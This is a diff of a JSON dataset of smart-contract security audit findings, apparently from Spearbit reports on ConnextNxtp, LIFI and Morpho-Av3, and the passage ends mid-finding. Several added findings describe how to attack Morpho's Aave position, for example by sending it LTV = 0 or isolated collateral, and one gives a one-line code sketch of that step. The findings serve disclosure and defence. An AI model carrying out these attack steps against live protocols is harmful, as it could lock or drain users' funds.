of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that what previously was BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router", + "title": "Incorrect comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The highlighted comment incorrectly refers to the USDC address as the DAI address.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Robustness of receiving contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _execute- Calldata() and excessivelySafeCall() don't revert when the underlying call reverts This seems to be inten- tional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. 
The receiving contract already has received the tokens via handleOutgoingAsset() so must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ... } }", + "title": "Redundant console log", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contract includes Console.sol from a test file, which is only used for debugging purposes. Including it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Functions can be combined", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both xcall and xcallIntoLocal have same code except receiveLocal (which is set false for xcall and true for xcallIntoLocal) value. Instead of having these as separate function, a single function can be created which can tweak the functionalities of xcall and xcallIntoLocal on basis of receiveLocal value", + "title": "SquidFacet doesn't revert for incorrect routerType", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "If _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or CallBridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when combined with the issue \"Max approval to any address is possible\", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document source of zeroHashes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex\"0000000000000000000000000000000000000000000000000000000000000000\"; ... bytes32 internal constant Z_31 = hex\"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9\"; ,! ,! }", + "title": "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and \"pure\" supply), borrow and liquidate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert. 1) Withdraw: if the asset withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 
2) Transfer: if the from address is using the asset as collateral, is borrowing something, and the asset transferred is an AToken with LTV > 0, the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0, the operation will revert. Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, depending on the operation itself (like, for example, an HF check). While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because the \"poisoned\" AToken cannot be removed from the Morpho wallet, part of the Morpho mechanics will break. Morpho's users might not be able to withdraw both collateral and \"pure\" supply. Morpho's users might not be able to borrow. Morpho's users might not be able to liquidate. Morpho's users might not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Document underflow/overflows in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function index() has an overflow when _bytes derflow when _len == 0. These two compensate each other so the end result of index() is as expected. As the special case for _bytes == 0 is also handled, we assume this is intentional. However this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } }", + "title": "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, borrow and liquidate operations could stop working", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert. 1) Withdraw: if the asset withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 2) Transfer: if the from address is using the asset as collateral, is borrowing something, and the asset transferred is an AToken with LTV > 0, the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0, the operation will revert. Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, depending on the operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral and the victim will suffer from all the side effects previously explained. 
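As a purely illustrative sketch of this vector (hypothetical names, using Aave v3's Pool interface): POOL.supply(ltv0Underlying, 1, address(morpho), 0); // mints the LTV = 0 aToken directly to Morpho; since Morpho held no prior balance of it, Aave flags it as collateral for Morpho's position.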
While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply. 6 Morpho's users could not be able to borrow. Morpho's users could not be able to liquidate. Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Use while loops in dequeueVerified()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Within function dequeueVerified() there are a few for loops that mention a variable as there first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } }", + "title": "Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. 
The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price, which is different from the price that Aave would use.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Duplicate functions in Encoding.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byte- Hex(), encodeHex().", + "title": "Isolated assets are treated as collateral in Morpho", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract is intended not to be in isolation mode to avoid its restrictions. Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them, which should not be possible: Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Document about two MerkleTreeManager's", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues.", + "title": "Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho handles it in the _assetLiquidityData function: function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. 
// In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... } The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user's Health Factor. The Health Factor is used to calculate both whether a user can be liquidated and what percentage of the collateral can be seized, and to calculate whether a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= liquidationThreshold; this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to: deny a user's collateral withdrawal (while an Aave user could have done it); deny a user's borrow (while an Aave user could have done it); make a user liquidatable (while an Aave user could have been healthy); and increase the possibility that the liquidator seizes the full collateral of the borrower (instead of 50%).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Match filename to contract name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Sometimes the name of the .sol file is different than the contract name. Also sometimes multiple contracts are defined in the same file. Additionally there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol 148 contract ERC20 is IERC20, IERC20Permit, EIP712 { ... 
}", + "title": "RewardsManager does not take in account users that have supplied collateral directly to the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Use uint40 for type in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface.", + "title": "Accounting issue when repaying P2P fees while having a borrow delta", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Comment in function typeOf() is inaccurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... 
// 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } }", + "title": "Repaying with ETH does not refund excess", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Missing Natspec documentation in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "unsafeJoin()'s Natspec documentation is incomplete as the second argument to function is not documented.", + "title": "Morpho can end up in isolation mode", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract has a single Aave position for all its users and therefore does not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: Up to deployment, an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment. This attack also works if Morpho does not intend to create a market for the isolated asset. Upon deployment and market creation: an attacker or unknowing user is the first to supply an asset and this asset is an isolated asset; Morpho's Aave position automatically enters isolation mode. At any time if an isolated asset is the only collateral asset. 
This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: High Risk" ] }, { - "title": "Remove irrelevant comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": " Instance 1 - TypedMemView.sol#L770 clone() has this comment that seems to be copied from equal(). This is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. Instance 2 - SpokeConnector.sol#L499 The function process of SpokeConnector contains comments that are no longer relevant. // check re-entrancy guard // require(entered == 1, \"!reentrant\"); // entered = 0; Instance 3 - BridgeFacet.sol#L419 Nomad is no longer used within Connext. However, they are still being mentioned in the comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using ,! the nomad * network.", + "title": "Collateral setters for Morpho / Aave can end up in a deadlock", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id)) { revert Errors.AssetNotCollateralOnPool(); } This will be bad if new users deposit after having withdrawn the entire asset. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to liquidating the Morpho Aave position.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Incorrect comment about TypedMemView encoding", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A TypedMemView variable of type bytes29 is encoded as follows: First 5 bytes encode a type flag. Next 12 bytes point to a memory address. Next 12 bytes encode the length of the memory view (in bytes). Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), _mask)", + "title": "First reward claim is zero for newly listed reward tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. 
When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1. Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex can be late: the startingIndex isn't initialized to 0 but to some asset index that accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardManager that initializes all rewards for an asset, this difference should be negligible.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Constants can be used in assembly blocks directly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. Highlighted code above have the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in assembly code.", + "title": "Disable creating markets for siloed assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users: \"This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. if user borrows siloed asset, they cannot borrow any other asset. This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol.\" - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing any of the other assets.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Document source of processMessageFromRoot()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment where it is derived from. Most other functions have a link to the source. 
Linking to the source would make the function easier to verify and maintain.", + "title": "A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In withdrawLogic, Morpho recalculates the maxIterations to be used internally as Math.max(_defaultIterations.withdraw, maxIterations), and in repayLogic it directly uses _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppliers/borrowers during promotion/demotion operations. function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going on until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations. If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process; in that case, if the operations revert because of OOG, it's not an issue per se. The problem arises for withdraw and repay operations, where Morpho is forcing the number of iterations and could make all those transactions always revert in case the matching engine does not match enough balance in time. Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could revert during the following operations just because _promoteOrDemote has consumed enough gas that the following operations run out of the remaining gas.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Be aware of zombies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _validateSendRoot() of ArbitrumHubConnector check that stakerCount and child- StakerCount are larger than 0. The definition of stakerCount and childStakerCount document that they could include zombies. Its not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, \"!staked\"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. 
This includes real stakers and zombies uint64 childStakerCount;", + "title": "Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values used by the Morpho contract itself", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and PositionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the value of the PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._ADDRESSES_PROVIDER in both the setPositionsManager and initialize function.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Readability of proveAndProcess()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function proveAndProcess() is relatively difficult to understand because it first processes for the case of i==0 and then does a loop over i==1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, \"!sharedRoot\"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... }", + "title": "In _authorizeLiquidate, when healthFactor is equal to Constants.DEFAULT_LIQUIDATION_THRESHOLD Morpho is wrongly setting close factor to DEFAULT_CLOSE_FACTOR", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD Morpho is returning the wrong value for the closeFactor, allowing only 50% of the collateral to be liquidated instead of the whole amount. When the healthFactor is lower than or equal to the Constants.MIN_LIQUIDATION_THRESHOLD Morpho should return Constants.MAX_CLOSE_FACTOR, following the same logic applied by Aave. Note that the user cannot be liquidated even if healthFactor == MIN_LIQUIDATION_THRESHOLD if the priceOracleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Medium Risk" ] }, { - "title": "Readability of checker()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function checker() is relatively difficult to read due to the else if chaining of if statements. As the if statements call return(), the else isn't necessary and the code can be made more readable. 
function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes(\"EXECUTION_INTERVAL seconds are not passed yet\")); } else if (lastRootSent == outboundRoot) { return (false, bytes(\"Sent root is the same as the current root\")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } }", + "title": "_authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has not been allowed inside the priceOracleSentinel require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user would need to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those 